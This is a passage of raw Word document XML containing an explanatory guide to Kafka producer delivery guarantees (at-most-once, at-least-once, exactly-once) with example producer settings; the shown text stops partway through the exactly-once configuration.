    <w:p w14:paraId="04DFC24B" w14:textId="41F42DC6" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kafka Message Delivery Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D6E06"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Kafka provides three primary </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message delivery guarantees</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for producers when sending messages to Kafka topics. These guarantees define how messages are handled during transmission, especially in the case of failures. They are crucial in deciding how Kafka producers behave in different failure scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E28730"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Here are the three message delivery guarantees:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41692051" w14:textId="77777777" w:rsidR="0000666C"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8C0E53F">
          <v:rect id="_x0000_i3145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7909A222" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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1. At Most Once Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019DE2F9"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Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>At Most Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery, messages may be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lost</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>never delivered more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. If a failure occurs while sending the message, the producer will </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not retry</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending it, and the message will be lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21191E3C" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA9AAFB" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>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No retries</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the producer fails to get an acknowledgment from the broker, it doesn’t retry sending the message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17113398" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>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Message Loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This guarantee ensures there are no duplicates but may result in some messages being dropped (lost).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F50645" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This is suitable for logging or stateless systems where message loss can be tolerated and is preferable to duplicate messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FE3373" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Kafka Producer Config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0886F7"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acks=0       # No acknowledgment is required from the broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782E7071"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retries=0    # No retry on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289CA087" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC73017" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>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Low latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: As no retry mechanism is used, this guarantees the fastest message sending.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C9C0D" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1324"/>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Message loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If there’s a failure during message delivery, the message is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B7352" w14:textId="77777777" w:rsidR="0000666C"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B275536">
          <v:rect id="_x0000_i3146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D93C709" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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2. At Least Once Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09479198"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lastRenderedPageBreak/>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>At Least Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery, every message will be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered at least once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but some messages may be delivered </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more than once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if a retry occurs due to a failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A92839" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0978C86F" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>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Retries on failure</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If the producer doesn’t receive an acknowledgment (e.g., due to a network failure), it will </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>retry</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> sending the message until acknowledgment is received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AE06DD" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>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Duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This guarantee ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>no message is lost</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but in case of retries, there may be </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicate messages</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244A4380" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1325"/>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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is commonly used in systems where </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message loss is unacceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, but </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>duplicates can be handled</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as in order processing or analytics systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C38AD" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Kafka Producer Config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE72102"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acks=1        # Acknowledgment is required from the leader broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EA3399"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retries=3     # The producer will retry up to 3 times on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CA67C0" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Key Characteristics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FAEB31" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>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Message duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Possible, because retries are triggered on failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731DAAB6" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>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Ensures no message loss</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messages are guaranteed to be delivered to the broker, but duplicates might need to be handled by the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B083E" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1326"/>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Moderate latency</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retry behavior can introduce a slight delay.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E823BE" w14:textId="77777777" w:rsidR="0000666C"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FCE2B7">
          <v:rect id="_x0000_i3147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AFF51C" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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3. Exactly Once Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265AF8C8"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Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">With </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly Once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> delivery, each message is </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delivered exactly once</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no duplication or message loss, even in the case of retries. This is the strongest guarantee but comes with some overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B06E0AF" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E64CC1" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>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Idempotence</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka ensures </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producers</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to prevent message duplication. This means the producer sends a message, and Kafka guarantees that even if the producer retries, it will not create duplicates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1B3DEA" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>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Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka also supports </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that a group of messages is committed atomically. This ensures that the messages are either all written successfully or none at all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F22FD84" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C" w:rsidP="008E5BA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1327"/>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Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: This is used in systems where </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>both message loss and duplicates are unacceptable</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5BA7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as in banking transactions, payment systems, or critical inventory systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C64A40A" w14:textId="77777777" w:rsidR="0000666C" w:rsidRPr="008E5BA7" w:rsidRDefault="0000666C"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Kafka Producer Config:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF613D6"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acks=all                    # Acknowledgment is required from all in-sync replicas (ISR).</w:t>
      </w:r>
    </w:p>
